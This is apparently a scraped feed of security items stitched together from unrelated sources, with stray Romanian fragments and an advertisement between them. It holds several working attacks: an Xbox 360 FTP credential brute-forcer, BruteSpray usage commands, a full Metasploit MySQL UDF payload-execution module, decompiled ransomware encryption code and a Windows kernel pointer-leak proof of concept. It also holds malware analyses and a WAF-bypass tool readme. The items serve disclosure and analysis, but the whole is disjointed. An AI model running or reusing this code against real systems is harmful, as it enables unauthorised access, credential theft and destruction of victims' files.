[... and more] [ETX] Source: https://packetstormsecurity.com/files/145534/Vitek-Remote-Code-Execution-Information-Disclosure.html

XBOX 360 Aurora version 0.6b default credential FTP bruteforcing script. # Exploit Title: XBOX 360 Aurora 0.6b Default Credentials / FTP BruteForce # Date: 20/12/2017 # Exploit Author: Daniel Godoy # Vendor Homepage: http://phoenix.xboxunity.net/#/news # Tested on: XBOX 360 # GREETZ: Iker Legorreta, #RemoteExecution Team #!/usr/bin/env python # -*- coding:utf-8 -*- __author__ = 'Daniel Godoy' import argparse import sys from ftplib import FTP info = ''' XBOX 360 Aurora 0.6b Default Credentials / FTP BruteForce\n Usage: ./xbox_ftp_brute_forcer.py [options]\n Options: -t, --target <hostname/ip> | Target\n -u, --user <user> | User\n -w, --wordlist <filename> | Wordlist\n -h, --help <help> | print help\n Example: ./xbox_ftp_brute_forcer.py -t 192.168.1.1 -u root -w /root/Desktop/wordlist.txt ''' def help(): print info sys.exit(0) def check_default_login(target): try: ftp = FTP(target) ftp.login('xboxftp', 'xboxftp') ftp.quit() print "\n[+] Default login is open." print "\n[+] Username : xboxftp" print "\n[+] Password : xboxftp\n" ftp.quit() except: pass def ftp_login(target, username, password): try: ftp = FTP(target) ftp.login(username, password) ftp.quit() print "\n[*] Credentials have found." print "\n[*] Username : {}".format(username) print "\n[*] Password : {}".format(password) return True except: return False def brute_force(target, username, wordlist): try: wordlist = open(wordlist, "r") words = wordlist.readlines() for word in words: word = word.strip() if ftp_login(target, username, word): break except: print "\n[-] There is no such wordlist file. \n" sys.exit(0) parser = argparse.ArgumentParser() parser.add_argument("-t", "--target") parser.add_argument("-u", "--username") parser.add_argument("-w", "--wordlist") args = parser.parse_args() if not args.target or not args.username or not args.wordlist: help() sys.exit(0) target = args.target username = args.username wordlist = args.wordlist brute_force(target, username, wordlist) check_default_login(target) print "\n[-] Brute force finished. \n" Source: https://packetstormsecurity.com/files/145532/XBOX-360-Aurora-0.6b-Default-Credentials-FTP-Bruteforcer.html

BruteSpray Created by: Shane Young/@x90skysn3k && Jacob Robles/@shellfail Inspired by: Leon Johnson/@sho-luv Credit to Medusa: JoMo-Kun / Foofus Networks - http://www.foofus.net Version - 1.6.0 Demo: Description BruteSpray takes nmap GNMAP/XML output and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap. Installation pip install -r requirements.txt On Kali apt-get install brutespray Usage First do an nmap scan with -oG nmap.gnmap or -oX nmap.xml. Command: python brutespray.py -h Command: python brutespray.py --file nmap.gnmap Command: python brutesrpay.py --file nmap.xml Command: python brutespray.py --file nmap.xml -i Examples Using Custom Wordlists: python brutespray.py --file nmap.gnmap -U /usr/share/wordlist/user.txt -P /usr/share/wordlist/pass.txt --threads 5 --hosts 5 Brute-Forcing Specific Services: python brutespray.py --file nmap.gnmap --service ftp,ssh,telnet --threads 5 --hosts 5 Specific Credentials: python brutespray.py --file nmap.gnmap -u admin -p password --threads 5 --hosts 5 Continue After Success: python brutespray.py --file nmap.gnmap --threads 5 --hosts 5 -c Use Nmap XML Output python brutespray.py --file nmap.xml --threads 5 --hosts 5 Interactive Mode python brutespray.py --file nmap.xml -i Supported Services ssh ftp telnet vnc mssql mysql postgresql rsh imap nntp pcanywhere pop3 rexec rlogin smbnt smtp svn vmauthd snmp Changelog v1.6.0 added support for SNMP v1.5.3 adjustments to wordlists v1.5.2 change tmp and output directory behavior v1.5.1 added check for no services v1.5 added interactive mode v1.4 added ability to use nmap XML v1.3 added the ability to stop on success added the ability to reference custom userlists and passlists added the ability to specify specific users & passwords Download: brutespray-master.zip git clone https://github.com/x90skysn3k/brutespray.git Source: https://github.com/x90skysn3k/brutespray

https://www.hybrid-analysis.com/sample/5af6c81056efc5768b8c269e81c769d75f39d8e31b4f048616998f0bd552a743?environmentId=100

This Metasploit module creates and enables a custom UDF (user defined function) on the target host via the SELECT ... into DUMPFILE method of binary injection. On default Microsoft Windows installations of MySQL versions 5.5.9 and below, directory write permissions not enforced, and the MySQL service runs as LocalSystem. NOTE: This Metasploit module will leave a payload executable on the target system when the attack is finished, as well as the UDF DLL, and will define or redefine sys_eval() and sys_exec() functions. mysql_udf_payload.rb ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MYSQL include Msf::Exploit::CmdStager def initialize(info = {}) super( update_info( info, 'Name' => 'Oracle MySQL UDF Payload Execution', 'Description' => %q{ This module creates and enables a custom UDF (user defined function) on the target host via the SELECT ... into DUMPFILE method of binary injection. On default Microsoft Windows installations of MySQL (=< 5.5.9), directory write permissions not enforced, and the MySQL service runs as LocalSystem. NOTE: This module will leave a payload executable on the target system when the attack is finished, as well as the UDF DLL, and will define or redefine sys_eval() and sys_exec() functions. }, 'Author' => [ 'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the lib_mysqludf_sys.dll binaries 'todb', # this Metasploit module 'h00die' # linux addition ], 'License' => MSF_LICENSE, 'References' => [ # Bernardo's work with cmd exec via udf [ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ] ], 'Platform' => ['win', 'linux'], 'Targets' => [ [ 'Windows', {'CmdStagerFlavor' => 'vbs'} ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit) [ 'Linux', {'CmdStagerFlavor' => 'wget' } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 16 2009' # Date of Bernardo's blog post. )) register_options( [ OptBool.new('FORCE_UDF_UPLOAD', [ false, 'Always attempt to install a sys_exec() mysql.function.', false ]), OptString.new('USERNAME', [ false, 'The username to authenticate as', 'root' ]) ]) end def username datastore['USERNAME'] end def password datastore['PASSWORD'] end def login_and_get_sys_exec m = mysql_login(username,password,'mysql') return if not m @mysql_arch = mysql_get_arch @mysql_sys_exec_available = mysql_check_for_sys_exec() if !@mysql_sys_exec_available || datastore['FORCE_UDF_UPLOAD'] mysql_add_sys_exec @mysql_sys_exec_available = mysql_check_for_sys_exec() else print_status "sys_exec() already available, using that (override with FORCE_UDF_UPLOAD)." end return m end def execute_command(cmd, opts) mysql_sys_exec(cmd, datastore['VERBOSE']) end def exploit m = login_and_get_sys_exec() if not m return elsif not [:win32,:win64,:linux64,:linux32].include?(@mysql_arch) print_status("Incompatible MySQL target architecture: '#{@mysql_arch}'") return else if @mysql_sys_exec_available execute_cmdstager({:linemax => 1500, :nodelete => true}) handler else print_status("MySQL function sys_exec() not available") return end end disconnect end end Source: https://packetstormsecurity.com/files/145526/Oracle-MySQL-UDF-Payload-Execution.html

Although the original creators of the infamous IoT malware Mirai have already been arrested and sent to jail, the variants of the notorious botnet are still in the game due to the availability of its source code on the Internet. Hackers have widely used the infamous IoT malware to quietly amass an army of unsecured internet-of-things devices, including home and office routers, that could be used at any time by hackers to launch Internet-paralyzing DDoS attacks. Another variant of Mirai has hit once again, propagating rapidly by exploiting a zero-day vulnerability in a Huawei home router model. Dubbed Satori (also known as Okiku), the Mirai variant has been targeting Huawei's router model HG532, as Check Point security researchers said they tracked hundreds of thousands of attempts to exploit a vulnerability in the router model in the wild. Identified initially by Check Point researchers late November, Satori was found infecting more than 200,000 IP addresses in just 12 hours earlier this month, according to an analysis posted by Chinese security firm 360 Netlab on December 5. Researchers suspected an unskilled hacker that goes by the name "Nexus Zeta" is exploiting a zero-day remote code execution vulnerability (CVE-2017-17215) in Huawei HG532 devices, according to a new report published Thursday by Check Point. The vulnerability is due to the fact that the implementation of the TR-064 (technical report standard), an application layer protocol for remote management, in the Huawei devices was exposed on the public Internet through Universal Plug and Play (UPnP) protocol at port 37215. Since this vulnerability allowed remote attackers to execute arbitrary commands to the device, attackers were found exploiting this flaw to download and execute the malicious payload on the Huawei routers and upload Satori botnet. In the Satori attack, each bot is instructed to flood targets with manually crafted UDP or TCP packets. Although the researchers observed a flurry of attacks worldwide against the Huawei HG532 devices, the most targeted countries include the United States, Italy, Germany, and Egypt. Check Point researchers "discretely" disclosed the vulnerability to Huawei as soon as their findings were confirmed, and the company confirmed the vulnerability and issued an updated security notice to customers on Friday. The company also offered some mitigations that could circumvent or prevent the exploit, which included using the built-in firewall function, changing the default credentials of their devices, and deploying a firewall at the carrier side. Users can also deploy Huawei NGFWs (Next Generation Firewall) or data center firewalls, and upgrade their IPS signature database to the latest IPS_H20011000_2017120100 version released on December 1, 2017, in order to detect and defend against this flaw. Via thehackernews.com

We found a new cryptocurrency-mining bot spreading through Facebook Messenger, which we first observed in South Korea. We named this Digmine based on the moniker (비트코인 채굴기 bot) it was referred to in a report of recent related incidents in South Korea. We’ve also seen Digmine spreading in other regions such as Vietnam, Azerbaijan, Ukraine, Vietnam, Philippines, Thailand, and Venezuela. It’s not far-off for Digmine to reach other countries given the way it propagates. Facebook Messenger works across different platforms, but Digmine only affects Facebook Messenger’s desktop/web browser (Chrome) version. If the file is opened on other platforms (e.g., mobile), the malware will not work as intended. Digmine is coded in AutoIt, and sent to would-be victims posing as a video file but is actually an AutoIt executable script. If the user’s Facebook account is set to log in automatically, Digmine will manipulate Facebook Messenger in order to send a link to the file to the account’s friends. The abuse of Facebook is limited to propagation for now, but it wouldn’t be implausible for attackers to hijack the Facebook account itself down the line. This functionality’s code is pushed from the command-and-control (C&C) server, which means it can be updated. A known modus operandi of cryptocurrency-mining botnets, and particularly for Digmine (which mines Monero), is to stay in the victim’s system for as long as possible. It also wants to infect as many machines as possible, as this translates to an increased hashrate and potentially more cybercriminal income. Figure 1: Digmine’s attack chain Figure 2: Link to Digmine sent via Facebook Messenger (top, cropped) and the file pretending to be a video (bottom); original image source: c0nstant (bottom right) Infection Chain Digmine is a downloader that will first connect to the C&C server to read its configuration and download multiple components. The initial configuration contains links where it downloads components, most of which are also hosted on the same C&C server. It saves the downloaded components in the %appdata%\<username> directory. Figure 3: Configuration for the downloader (top); and the downloaded components (bottom) Digmine will also perform other routines such as installing a registry autostart mechanism as well as system infection marker. It will search and launch Chrome then load a malicious browser extension that it retrieves from the C&C server. If Chrome is already running, the malware will terminate and relaunch Chrome to ensure the extension is loaded. While extensions can only be loaded and hosted from the Chrome Web Store, the attackers bypassed this by launching Chrome (loaded with the malicious extension) via command line. Figure 4: Digmine downloader component in the autostart registry entry (top), and a marker indicating the malware has infected the system (bottom) Figure 5: Currently running Chrome process terminated (top) and relaunching Chrome with parameter to load extension (bottom) The extension will read its own configuration from the C&C server. It can instruct the extension to either proceed with logging in to Facebook or open a fake page that will play a video. The decoy website that plays the video also serves as part of their C&C structure. This site pretends to be a video streaming site but also holds a lot of the configurations for the malware’s components. Figure 6: Configuration link for the decoy video if a separate routine is set by the configuration from the C&C (top), and screenshot of a fake streaming site used to play video as decoy (bottom) Figure 7: Initial configuration used by the browser extension Propagation The browser extension is responsible for propagation via interaction with Chrome, and by extension, Facebook Messenger. This routine is triggered by conditions available in the configuration file retrieved from the C&C server. If the user has their Facebook account automatically logged in by default, the browser extension is able to interact with their account. It does so by downloading additional code from the C&C server. Digmine’s interaction with Facebook could get more functions in the future since it’s possible to add more code. Figure 8: Part of additional codes retrieved from C&C server, which allows interaction with Facebook Mining Component The miner module will be downloaded by codec.exe, which is the miner management component. It will connect to another C&C server to retrieve the miner and its corresponding configuration file. The mining component miner.exe is an iteration of an open-source Monero miner known as XMRig. The miner was reconfigured to execute using the config.json file instead of receiving parameters directly from the command line. Figure 9: Miner configuration (top) and codec.exe code launching the miner component with config (bottom) C&C Communication and Protocol Both the downloader and mining management component use specific HTTP headers to communicate with the C&C server. When downloading the initial configuration, the malware constructs the HTTP GET request before sending to the C&C server: GET /api/apple/config.php HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Miner Window: <Window name of active window> ScriptName: <filename of malware> OS: <OS version> Host: <C&C> Of note is how the malware uses a specific User-Agent called Miner. It denies access to the initial configuration file if the HTTP header request is incorrect. Best Practices The increasing popularity of cryptocurrency mining is drawing attackers back to the mining botnet business. And like many cybercriminal schemes, numbers are crucial—bigger victim pools equate to potentially bigger profits. The fact that they’re piggybacking on popular platforms such as social media to spread their malware is unsurprising. To avoid these types of threats, follow best practices on securing social media accounts: think before you share, be aware of suspicious and unsolicited messages, and enable your account’s privacy settings. We disclosed our findings to Facebook, which promptly removed many of the Digmine-related links from its platform. In Facebook’s official statement, “We maintain a number of automated systems to help stop harmful links and files from appearing on Facebook and in Messenger. If we suspect your computer is infected with malware, we will provide you with a free anti-virus scan from our trusted partners. We share tips on how to stay secure and links to these scanners on facebook.com/help.” Indicators of Compromise (IoCs): Hash detected as TROJ_DIGMINEIN.A (SHA256); beb7274d78c63aa44515fe6bbfd324f49ec2cc0b8650aeb2d6c8ab61a0ae9f1d Hash detected as BREX_DIGMINEEX.A (SHA256): 5a5b8551a82c57b683f9bd8ba49aefeab3d7c9d299a2d2cb446816cd15d3b3e9 Hash detected as TROJ_DIGMINE.A (SHA256): f7e0398ae1f5a2f48055cf712b08972a1b6eb14579333bf038d37ed862c55909 C&C servers related to Digmine (including subdomains): vijus[.]bid ozivu[.]bid thisdayfunnyday[.]space thisaworkstation[.]space mybigthink[.]space mokuz[.]bid pabus[.]bid yezav[.]bid bigih[.]bid taraz[.]bid megu[.]info Source: http://blog.trendmicro.com/trendlabs-security-intelligence/digmine-cryptocurrency-miner-spreading-via-facebook-messenger/

WEB MONITORING AND TRUST BADGES Get free trust badges and monitoring for your first 2 domains Start converting more visitors to paid subscribers Blacklisting alerts Monitor your domain for SPAM blacklisting and safe browsing problems like malware, spyware and trojans. Get notified before you lose your traffic! SSL monitoring You'll be alerted if there are any problems with your SSL certificate and get renewal reminders before it expires. Trust badges Add the Trustocity badge to your site and improve visitor confidence. Users buy / subscribe more from sites they trust. Source: https://trustocity.com/

nu le da idei

ete cine sparge locuinte

Online Malware Analysis Report: https://www.reverse.it/sample/86e0eac8c5ce70c4b839ef18af5231b5f92e292b81e440193cdbdc7ed108049f?environmentId=100 Analysis mode: Static and Dynamic Analysis Host Operating System: Windows 7 64 bit Guest Operating System: Windows 7 32 bit Containment: Vmware v12 Firewall/Security Installed: Windows Defender (Static Analysis) Analysis Tools Used: IDA, .NET Reflector (Static Analysis) Analysis screenshots: Yes (Dynamic Analysis) Analysis Tools Used: Process Monitor, Process Explorer (Dynamic Analysis) Analysis screenshots: Yes Introduction Ransomware is a type of malware which usually acts as a trojan horse, the user mistakes it for a legitimate file and when he activates the “program, it begins encrypting files on the computer. when the task is completed it demands a ransom, usually in bitcoins. in most cases you have two options: pay the ransom lose your files for ever surprisingly a lot of people choose to pay the ransom to get their files back, as seen with CryptoLocker back in 2013. Today we will be reviewing a sample I randomly picked up at Here, a pretty good malware collection. My Sample Static review Opening the file in IDA reveals that this malware is written in .NET IDA is unable to make this file readable, expose is imports or exports but before moving on to a .NET decompiler I decide to explore the Strings and Names view. String view seems empty: Names: The strings raise my suspicious since the program does not seem to hide its intentions. This was enough. I headed to the decompiler, I am using the .NET Reflector for this one how ever it is not free, you should use dotPeek. The program contains the following structure: Form 1: Fields and Methods: //Fields private Button button; private IContainer components = null; private string computerName = Environment.MachineName.ToString(); private Label label1; private Label label2; private PictureBox pictureBox1; private string userDir = @"C:\Users\"; private string userName = Environment.UserName; //Methods public Form1(); public byte[] AES_Encrypt(byte[] bytesToBeEncrypted, byte[] passwordBytes); private void button1_Click(object sender, EvenArgs e); public string CreatePassword(int lenghts); protected override void Dispose(bool disposing); public void encryptDirectory(string location, string password); public void EncryptFile(string file, string password); private void Form_Shown(object sender, EventArgs e); private void Form1_Load(object sender, EventArgs e); private void InitializeComponent(); public void messageCreator(); public void SendPassword(string password); public void startAction(); Form1 constructor: I would be curios why he chose to create the constructor like this: //public Form1() { this.InitializeComponent(); RegistryKet key2 = Registry.CurrentUser.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\ if (key2.GetValue("DisableTaskMgr") == null) { key2.Setvalue("DisableTaskMgr","1"); } else { key2.DeleteValue("DisableTaskMgr"); } RegistryKet key - Registry.CurrentUser.CreateSubKey(@"Control Panel\Desktop"); key.SetValue("Wallpaper","0"); key.Close(); key2.Close(); } full registry path - “Software\Microsoft\Windows\CurrentVersion\Policies\System" This constructor disables the task manager and blacks out the wall paper. AES_Encrypt: This was the most interesting function, I will expand on it and explain how Symmetric encryption works. This encryption works with one key, to encrypt a piece of plain text. both of the parties need to know the key. The AES encryption is an iterative algorithm. which means we will need the following to construct it: The key - passwordBytes CipherMode - ECB (electronic code book) is basically raw cipher. For each block of input, you encrypt the block and get some output. The problem with this transform is that any resident properties of the plaintext might well show up in the ciphertext – possibly not as clearly – that's what blocks and key schedules are supposed to protect againt, but analyzing the patterns you may be able to deduce properties that you otherwise thought were hidden. CBC mode is short for cipher block chaining. You have an initialization vector which you XOR the first block of plaintext against. You then encrypt that block of plaintext. The next block of plaintext is xor'd against the last encrypted block before you encrypt this block. IV or Initialization Vector - since the AES is iterative, each encpytion block is dependant on the previous block but the first block does not have a previous block, to solve this problem the IV was born. Block Size - The plain text will be split into blocks, each in block size. that means that if the block size is 64 bits and the text is 130 bit size then you'll get 3 blocks, two blocks with plain text in size of 64 bits and another block with 2 bits of plain text and another 28 bits of padded bits. Key Size You can read all about it here: ECB OR CBC What is a block chiper Why use IV's Regarding on how AES works, I wont get into it. lets see what happens in the code First the function accepts two parameters, the bytes we will encrypt and the key. It creates a salt. We can see also that it creates a random generated key and a IV using the DeriveBytes class. “Rfc2898DeriveBytes is an implementation of PBKDF2. What it does is repeatedly hash the user password along with the salt.” the third parameter is the number of iterations. The GetBytes function returns the pseudo-random key for this object. So the key and the IV are fully randomized based on the size of the key and the block size. Finishing it up with setting the chiper to CBC mode since AES is CBC. So as we can see, this is not just AES encryption, first we use one key to generate a key. from that key we generate two more keys(Key for AES and the IV), then and only then we encrypt bytesToBeEncrypted. the function translates the stream to a byte buffer and returns it . Keep in mind, this is not complex. With a proper crypter this lame ass .NET program can bypass most AV detection. EncryptFile: public void EncrypFile(string file, string password) { byte[] bytesToBeEncrypted = File.ReadAllBytes(file); byte[] bytes = Encoding.UTF8.GetBytes(password); bytes = SHA256.Create().Computerhash(bytes); byte[] buffer3 = this.AES_Encrypt(bytesToBeEncrypted, bytes); File.WriteAllBytes(file,buffer3); File.Move(file, file+"WINDOWS"); } The function accepts a string file, probably the path. then it generates another another pass key, hashes it and encrypts it with the AES_Encrypt. it changes the file extension and overwrites it. Message Creator: public void messageCreator() { string str = @"\Desktop\READ_IT.txt"; string path = this.userDir + this.userName + str; string[] contents = new string[] {"Your files have been er File.WriteAllLines(path, contents); } The message creator drops a readme file onto the desktop upon function call CreatePassword: public string CreatorPassword(int length) { StringBuilder builder - new StringBuilder(); Random random = new Random(); while (0 < length--) { builder.Append("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=&?&/"[random.Next("abcdefghijk } return builder.ToString(); } Basically, a random password generator. SendPassword: public void SendPassword(string password) { string[] textArray1 = new string[] {this.computerName, "-", this.userName, " ", password ); string str - string.Concat(textArray1); } I am confused for what this function is doing seems like nothing, more on the dynamic analysis. EncryptDirectory: Encrypts all the files in the directory, it gets all the extensions to the files in the directory and if the current file has one of the extensions the malware is looking for, it encrypts the file. The main functionality: public void startAction() { string password - this.CreatePassword(15); string str2 = @"\Desktop\" string location = this.userDir + this.userName + str2; this.SendPassword(password); this.encryptDirectory(location, password); this.messageCreaor(); password = null; } It seems the malware is only encrypting files on the desktop, since it is hard coded as a function parameter. The rest of the forms don't have anything special, except from this : private void button1_Click(object sender, EventArgs e) { MessageBox.Show("Checking Payment.............Pleasse Wait", "Please wait"); MessageBox.Show("Your Payment has failed, The funs have been sent back to your wallet. Please send it again", "Error"); } Found on form3, this is very worrying. I also did not see any decryption methods that could be triggered. Static Conclusion: The malware generates a new password, or a key. then it uses that key to encrypt all the files on the directory which is the desktop in this malware’s case. when this task is completed it drops a readme file and pops up a window with payment options and warning options. Dynamic Review: Running Process explorer and Process monitor, I filtered unrelated process events out of the program. The program indeed, dropped a read_it file and encrypted only the files located on the desktop and disabled the task manager. Attempt to black out the wallpaper as seen in Process Monitor: 11:04:.... 3520 RegSetValue HKCU\Control Panel\Desktop\Wallpaper SUCCESS Type: REG_SZ, Le... Disable Task Manager: Drop READ_IT file: But it's easy to revert most of its effects. The desktop has not been changed, and we simply need to remove the registry key that I showed above to restore the Task Manager operations. The program has suspected made no contact with any server or IP if your files are encrypted with this program you cannot revert the files back, EVER. When you click that you paid for the decryption the program prompts this message: Clicking “OK” will always result in the following message as seen in the code: But the money will not be refunded as there are no other function triggers to this button click as seen in the code The program adds the .WINDOWS extension to all files it encrypts on the desktop (It only encrypts files on the desktop), removing that extension back to the original one will show a messed up file. Conclusion: This program is dangerous, but not the most dangerous. you can't run it unless you have the correct version of .NET installed on your computer. It only encrypts files on the desktop and not to mention that it does not encrypt all file extensions. It does disable the task manager and attempts to change the desktop background but you can revert those effects back. The only thing that you won't get back is your files. This example shows how easy it is to construct ransomware, how easy it is to steal money and even in 2017 (this sample was caught in june 2017) people still download and double click on files called “VapeHacksLoader” and run them. Be careful out there Source: https://malwaretips.com/threads/the-ucylocker-ransomware.78330/

^the essence of digital core

WhatWaf? WhatWaf is an advanced firewall detection tool who's goal is to give you the idea of "There's a WAF?". WhatWaf works by detecting a firewall on a web application, and attempting to detect a bypass (or two) for said firewall, on the specified target. Features Ability to run on a single URL with the -u/--url flag Ability to run through a list of URL's with the -l/--list flag Ability to detect over 40 different firewalls Ability to try over 20 different tampering techniques Ability to pass your own payloads either from a file, from the terminal, or use the default payloads Default payloads that are guaranteed to produce at least one WAF triggering Ability to bypass firewalls using both SQLi techniques and cross site scripting techniques Ability to run behind multiple proxy types (socks4, socks5, http, https and Tor) Ability to use a random user agent, personal user agent, or custom default user agent Auto assign protocol to HTTP or ability to force protocol to HTTPS A built in encoder so you can encode your payloads into the discovered bypasses More to come... Installation Installing whatwaf is super easy, all you have to do is the following: Have Python 2.7, Python 3.x compatibility is being implemented soon: sudo -s << EOF git clone https://github.com/ekultek/whatwaf.git cd whatwaf chmod +x whatwaf.py pip2 install -r requirements.txt ./whatwaf.py --help Proof of Concept First we'll run the website through WhatWaf and figure out which firewall protects it (if any): Next we'll go to that website and see what the page looks like: Hmm.. that doesn't really look like Cloudflare does it? Lets see what the headers say: And finally, lets try one of the bypasses that it tells us to try: Demo video Get involved! If you want to make some tamper scripts, want to add some functionality or just want to make something look better. Getting involved is easy: Fork the repository Edit the code to your liking Send a pull request I'm always looking for some helpful people out there, and would love help with this little side project I got going on, Thanks! Download: WhatWaf-master.zip git clone https://github.com/Ekultek/WhatWaf.git Source: https://github.com/Ekultek/WhatWaf

/* Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1456 We have discovered that it is possible to disclose addresses of kernel-mode Paged Pool allocations via a race-condition in the implementation of the NtQueryVirtualMemory system call (information class 2, MemoryMappedFilenameInformation). The vulnerability affects Windows 7 to 10, 32-bit and 64-bit. The output buffer for this information class is a UNICODE_STRING structure followed by the actual filename string. The output data is copied back to user-mode memory under the following stack trace (on Windows 7 64-bit): --- cut --- kd> k # Child-SP RetAddr Call Site 00 fffff880`03cfd8c8 fffff800`02970229 nt!memcpy+0x3 01 fffff880`03cfd8d0 fffff800`02970752 nt!IopQueryNameInternal+0x289 02 fffff880`03cfd970 fffff800`02967bb4 nt!IopQueryName+0x26 03 fffff880`03cfd9c0 fffff800`0296a80d nt!ObpQueryNameString+0xb0 04 fffff880`03cfdac0 fffff800`0268d093 nt!NtQueryVirtualMemory+0x5fb 05 fffff880`03cfdbb0 00000000`772abf6a nt!KiSystemServiceCopyEnd+0x13 --- cut --- An example of an output region is shown below: --- cut --- kd> db rdx rdx+r8-1 fffff8a0`01a78010 2e 00 30 00 00 00 00 00-20 80 a7 01 a0 f8 ff ff ..0..... ....... fffff8a0`01a78020 5c 00 44 00 65 00 76 00-69 00 63 00 65 00 5c 00 \.D.e.v.i.c.e.\. fffff8a0`01a78030 48 00 61 00 72 00 64 00-64 00 69 00 73 00 6b 00 H.a.r.d.d.i.s.k. fffff8a0`01a78040 56 00 6f 00 6c 00 75 00-6d 00 65 00 32 00 00 00 V.o.l.u.m.e.2... --- cut --- Here, we can observe a kernel-mode address (fffff8a0`01a78020) of the textual string that follows the UNICODE_STRING, at offset 0x8. This means that the entire original kernel-mode structure is copied to ring-3, and then later the client's UNICODE_STRING.Buffer pointer is fixed up to point into the userland string. This condition could be referred to as a "double write" (as opposed to double fetch), where the kernel first copies some sensitive/confidential data into user-mode, and later overwrites it with legitimate output. Due to the synchronous way applications interact with the system, the clients only see the end result and therefore cannot observe the information disclosure that takes place in the meantime. However, it is possible to exploit the race condition if one is aware of the existence of such a bug. In order to obtain the leaked kernel pointer, we must read it in between the two writes. This is easiest achieved by running two concurrent threads (on a multi-core machine) -- one continuously invoking the affected NtQueryVirtualMemory syscall, and the other reading the UNICODE_STRING.Buffer member in a loop and checking if it's a kernel-mode pointer. This scheme is implemented in the attached proof-of-concept program. An example output from Windows 7 64-bit is as follows: --- cut --- C:\>NtQueryVirtualMemory.exe Leaked pointer: fffff8a0014b2010 Leaked pointer: fffff8a0014f5010 Leaked pointer: fffff8a00153b010 Leaked pointer: fffff8a001567010 Leaked pointer: fffff8a0015b1010 Leaked pointer: fffff8a0015c9010 Leaked pointer: fffff8a0015dc010 Leaked pointer: fffff8a0015f9010 Leaked pointer: fffff8a0017ff010 Leaked pointer: fffff8a00180b010 Leaked pointer: fffff8a001810010 Leaked pointer: fffff8a001832010 Leaked pointer: fffff8a001833010 Leaked pointer: fffff8a00182a010 [...] --- cut --- ################################################################################ Update: The insecure behavior of nt!IopQueryNameInternal can be also reached via nt!NtQueryObject. See the following stack trace: --- cut --- kd> k # Child-SP RetAddr Call Site 00 fffff880`025548a8 fffff800`02970229 nt!memcpy+0x3 01 fffff880`025548b0 fffff800`02970752 nt!IopQueryNameInternal+0x289 02 fffff880`02554950 fffff800`02967bb4 nt!IopQueryName+0x26 03 fffff880`025549a0 fffff800`02971f7d nt!ObpQueryNameString+0xb0 04 fffff880`02554aa0 fffff800`0268d093 nt!NtQueryObject+0x1c7 05 fffff880`02554bb0 00000000`772abe3a nt!KiSystemServiceCopyEnd+0x13 --- cut --- And the region being copied: --- cut --- kd> db rdx rdx+r8-1 fffff8a0`01666bf0 2e 00 30 00 00 00 00 00-00 6c 66 01 a0 f8 ff ff ..0......lf..... fffff8a0`01666c00 5c 00 44 00 65 00 76 00-69 00 63 00 65 00 5c 00 \.D.e.v.i.c.e.\. fffff8a0`01666c10 48 00 61 00 72 00 64 00-64 00 69 00 73 00 6b 00 H.a.r.d.d.i.s.k. fffff8a0`01666c20 56 00 6f 00 6c 00 75 00-6d 00 65 00 32 00 00 00 V.o.l.u.m.e.2... --- cut --- Note the kernel-mode address fffff8a0`01666c00 at offset 0x8 of the memory dump. ################################################################################ MSRC have responded that their current policy with regards to addressing kernel pool pointer leaks is as follows: --- cut --- Please note that due to some By-Design kernel pointer leaks already present in our platforms, Information Disclosures which only disclose kernel pool pointers will only be serviced in v.Next until all by design disclosures can be resolved. Information Disclosures of uninitialized kernel memory will continue to be serviced via Security Updates. Any leaks within privileged processes will also be considered v.Next; unless you can supply PoC which proves that you can perform the same leak - but not kernel pool pointer leaks - as an unprivileged user. --- cut --- As this particular bug only facilitates the disclosure of kernel pool pointers, it was classified as a v.Next issue (fixed in a future version of Windows) and closed on the MSRC side. I'm therefore derestricting the details of the bug here, too. */ #include <Windows.h> #include <winternl.h> #include <cstdio> namespace globals { BYTE OutputBuffer[1024]; } // namespace globals typedef enum _MEMORY_INFORMATION_CLASS { MemoryMappedFilenameInformation = 2 } MEMORY_INFORMATION_CLASS; extern "C" NTSTATUS NTAPI NtQueryVirtualMemory( _In_ HANDLE ProcessHandle, _In_opt_ PVOID BaseAddress, _In_ MEMORY_INFORMATION_CLASS MemoryInformationClass, _Out_ PVOID MemoryInformation, _In_ SIZE_T MemoryInformationLength, _Out_opt_ PSIZE_T ReturnLength ); BOOL IsKernelPointer(ULONG_PTR Pointer) { #ifdef _WIN64 return (Pointer >= 0xfff8000000000000); #else // 32-bit return (Pointer >= 0x80000000); #endif } DWORD WINAPI ThreadProc( _In_ LPVOID lpParameter ) { PUNICODE_STRING OutputString = (PUNICODE_STRING)globals::OutputBuffer; ULONG_PTR LastPointer = 0; while (1) { ULONG_PTR Pointer = 0; memcpy(&Pointer, &OutputString->Buffer, sizeof(ULONG_PTR)); if (IsKernelPointer(Pointer) && Pointer != LastPointer) { printf("Leaked pointer: %Ix\n", Pointer); LastPointer = Pointer; } } return 0; } int main() { CreateThread(NULL, 0, ThreadProc, NULL, 0, NULL); while (1) { SIZE_T ReturnLength; NTSTATUS st = NtQueryVirtualMemory(GetCurrentProcess(), &main, MemoryMappedFilenameInformation, globals::OutputBuffer, sizeof(globals::OutputBuffer), &ReturnLength); if (!NT_SUCCESS(st)) { printf("NtQueryVirtualMemory failed, %x\n", st); ExitProcess(1); } } return 0; } Source: exploit-db.com

